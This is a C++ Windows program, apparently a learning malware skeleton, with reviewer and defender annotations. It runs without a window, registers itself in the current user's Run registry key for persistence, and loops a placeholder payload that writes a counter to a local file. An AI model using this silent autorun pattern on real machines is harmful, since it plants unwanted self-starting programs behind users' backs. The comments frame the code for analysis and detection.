- #include "framework.h"
- #include "FourthWindowsProgram.h"
- #include <windows.h>
- #include <iostream>
- #include <conio.h>
- #include <fstream>
- #include <streambuf>
- #include <thread>
- #include <ctime>
- #include <sstream>
- #include <string>
- #pragma warning(disable:4996)
- #define APP_NAME L"FourthWindowsProgram"
- #define HARDWARE_UNIQUE_ID_LENGTH 7
- #define RELATIVE_PATH_TO_HARDWARE_UNIQUE_ID "\\hardwareId.txt"
- using namespace std;
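/*
 * Call if you need to remove program from autoRun.
 *
 * Deletes the value named APP_NAME from the current user's Run key.
 * Registry key names are case-insensitive, so "Currentversion" below names
 * the same key that AddToAutoRunCallbackAndExecute writes to.
 */
void RemoveFromAutoRun() {
    // Start from NULL and check the open result: a failed open must not fall
    // through to deleting from, and then closing, a predefined root handle
    // such as HKEY_CURRENT_USER itself.
    HKEY runKey = NULL;
    const LONG openStatus = RegOpenKeyEx(
        HKEY_CURRENT_USER,
        L"SOFTWARE\\Microsoft\\Windows\\Currentversion\\Run",
        0,
        KEY_SET_VALUE,  // deleting a value needs only set-value access
        &runKey);
    if (openStatus != ERROR_SUCCESS) {
        return;
    }

    // A value that is already absent is fine for a cleanup routine, so the
    // result of the delete is deliberately not treated as an error.
    RegDeleteValue(runKey, APP_NAME);
    RegCloseKey(runKey);
}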
// Signature of the callbacks that receive this executable's path.
typedef void (*ProgramPathCallback)(string);
/*
 * Looks up the full path of the running executable with GetModuleFileName
 * and hands it, converted to a narrow string, to callback1 and then callback2.
 *
 * The callbacks run strictly in order, so callback2 is only reached if
 * callback1 returns. In this file callback1 is AddToAutoRunCallbackAndExecute,
 * which ends in ExecuteMalwareCode's endless loop, so the second callback
 * (CreateFileWithUniqueId) is never actually invoked.
 */
void getProgramAbsolutePath(ProgramPathCallback callback1, ProgramPathCallback callback2) {
    char myPath[_MAX_PATH + 1];
    wchar_t wtext[MAX_PATH];
    // NOTE(review): myPath is never initialised, so strlen() reads
    // indeterminate stack bytes and the count passed to mbstowcs() can exceed
    // the size of wtext. This is undefined behaviour and the likely cause of
    // the "variable 'ws' is corrupted" crash mentioned below. The converted
    // text is overwritten by GetModuleFileName on the next call anyway.
    mbstowcs(wtext, myPath, strlen(myPath) + 1);
    LPWSTR ptr = wtext;  // never used
    // A NULL module handle asks for the path of the current process's executable.
    // NOTE(review): the return value (length / failure) is not checked.
    GetModuleFileName(NULL, wtext, _MAX_PATH);
    wstring ws(wtext);
    // Element-wise wchar_t -> char narrowing, not a code-page conversion:
    // characters that do not fit in a char are mangled.
    string programPath = string(ws.begin(), ws.end());
    callback1(programPath);
    callback2(programPath);
    // to get rid of crash error: variable 'ws' is corrupted
    // NOTE(review): spinning forever avoids returning through the damaged
    // stack frame instead of fixing the overflow above, and busy-loops a core.
    while (1);
}
/*
 * Placeholder payload: once per second, rewrites a log file with an
 * incrementing counter. Never returns.
 *
 * Analyst note: the only effect visible here is the repeated write to the
 * hard-coded logger2.txt path below.
 */
void ExecuteMalwareCode() {
    int var = 100;
    while (1) {
        ::Sleep(1000);  // one iteration per second
        // A fresh stream is created on every pass and opened in the default
        // output mode, which truncates: the file only ever holds the latest
        // counter value. The stream is closed by its destructor at the end of
        // the iteration.
        ofstream myFile;
        // Hard-coded, user-specific path. If the open fails the stream is left
        // in a failed state and the write below is silently dropped.
        myFile.open(L"C:\\Users\\Kostya\\Desktop\\test\\logger2.txt");
        myFile << ++var;
    }
}
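/*
 * Returns the directory part of a Windows path: everything before the last
 * backslash, without the backslash itself.
 *
 * If `path` contains no backslash it is returned unchanged. Callers already
 * get that result today, but only as a side effect of an unsigned wrap-around
 * in the length arithmetic; it is now an explicit branch.
 */
std::string getAbsolutePathProgramDir(std::string path) {
    // rfind replaces the hand-written backwards scan, which used an int index
    // for a size_t length and built a temporary string per character.
    const std::string::size_type lastSeparator = path.rfind('\\');
    if (lastSeparator == std::string::npos) {
        return path;
    }
    return path.substr(0, lastSeparator);
}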
/*
 * Builds a string of `len` characters, each picked with rand() from a fixed
 * alphabet of digits, ASCII letters and punctuation.
 *
 * NOTE(review): despite the name, nothing here is read from the hardware; the
 * result is a pseudo-random tag that depends only on rand() and its seed.
 */
string getHardwareId(const int len) {
    static const char kAlphabet[] =
        "0123456789"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+-:;/?";
    // sizeof counts the terminating NUL, which must not be selectable.
    const size_t alphabetSize = sizeof(kAlphabet) - 1;

    string id;
    id.reserve(len);
    int remaining = len;
    while (remaining > 0) {
        id += kAlphabet[rand() % alphabetSize];
        --remaining;
    }
    return id;
}
/*
 * Reads the stored ID: the first line of hardwareId.txt in the directory that
 * contains `path` (the executable's own path).
 *
 * Returns an empty string when the file cannot be opened or has no content.
 */
string getHardwareIdFromFile(string path) {
    ifstream idFile(getAbsolutePathProgramDir(path) + RELATIVE_PATH_TO_HARDWARE_UNIQUE_ID);
    string firstLine;
    // On a stream that failed to open, getline leaves firstLine empty.
    getline(idFile, firstLine);
    return firstLine;
}
/*
 * Ensures an ID file exists next to the executable at `path`.
 *
 * If hardwareId.txt is missing, or its first line is shorter than
 * HARDWARE_UNIQUE_ID_LENGTH, the file is rewritten with a freshly generated
 * ID; otherwise it is left alone.
 *
 * Analyst note: the file is an on-disk artifact sitting beside the binary.
 */
void CreateFileWithUniqueId(string path) {
    // An empty result (file missing) also counts as "no usable ID yet".
    const string existingId = getHardwareIdFromFile(path);
    if (existingId.length() >= HARDWARE_UNIQUE_ID_LENGTH) {
        return;
    }

    const string idFilePath = getAbsolutePathProgramDir(path) + RELATIVE_PATH_TO_HARDWARE_UNIQUE_ID;
    const string freshId = getHardwareId(HARDWARE_UNIQUE_ID_LENGTH);

    // Default output mode truncates, replacing any short or partial ID.
    ofstream idFile(idFilePath);
    idFile << freshId;
    idFile.close();
}
/*
 * Registers `path` as a per-user autorun entry, then starts the payload loop.
 *
 * Writes a REG_SZ value named APP_NAME, holding `path`, under
 * HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and then calls
 * ExecuteMalwareCode(), which never returns.
 *
 * Defender note: this is the Run-key persistence pattern (MITRE ATT&CK
 * T1547.001). The key is under HKEY_CURRENT_USER, which the logged-on user
 * can write. The change is observable as a registry value-set event on that
 * key (for example Sysmon Event ID 13) and in autorun listings, and
 * RemoveFromAutoRun() in this file deletes the same value.
 */
void AddToAutoRunCallbackAndExecute(string path)
{
    // Element-wise char -> wchar_t widening; no code-page conversion is done.
    wstring progPath(path.begin(), path.end());
    HKEY hkey = NULL;
    // NOTE(review): createStatus is never inspected; if the call fails, hkey
    // is still passed to RegSetValueEx below.
    LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey);
    // The size argument is in bytes and includes the terminating NUL.
    // NOTE(review): status is never inspected and hkey is never closed.
    LONG status = RegSetValueEx(hkey, APP_NAME, 0, REG_SZ, (BYTE*)progPath.c_str(), (progPath.size() + 1) * sizeof(wchar_t));
    // Endless loop: control does not come back to the caller.
    ExecuteMalwareCode();
}
/*
 * Entry into the program's work: resolves the executable's own path and
 * passes it first to the autorun-registration callback and then to the
 * ID-file callback.
 *
 * The first callback ends in an endless loop, so the second one is never
 * reached as the code stands.
 */
void AddToAutoRunAndExecute() {
    ProgramPathCallback registerAndRun = AddToAutoRunCallbackAndExecute;
    ProgramPathCallback writeIdFile = CreateFileWithUniqueId;
    getProgramAbsolutePath(registerAndRun, writeIdFile);
}
/*
 * GUI-subsystem entry point. No window is created: the process seeds rand()
 * and goes straight into AddToAutoRunAndExecute().
 *
 * In practice the return below is not reached, because the call chain ends
 * in an endless loop.
 */
int APIENTRY wWinMain(_In_ HINSTANCE hInstance,
                      _In_opt_ HINSTANCE hPrevInstance,
                      _In_ LPWSTR lpCmdLine,
                      _In_ int nCmdShow)
{
    UNREFERENCED_PARAMETER(hPrevInstance);
    UNREFERENCED_PARAMETER(lpCmdLine);

    // Seed mixes wall-clock time with the process id; rand() is only used by
    // getHardwareId in this file.
    const unsigned seed = (unsigned)time(NULL) * getpid();
    srand(seed);

    AddToAutoRunAndExecute();
    return 0;
}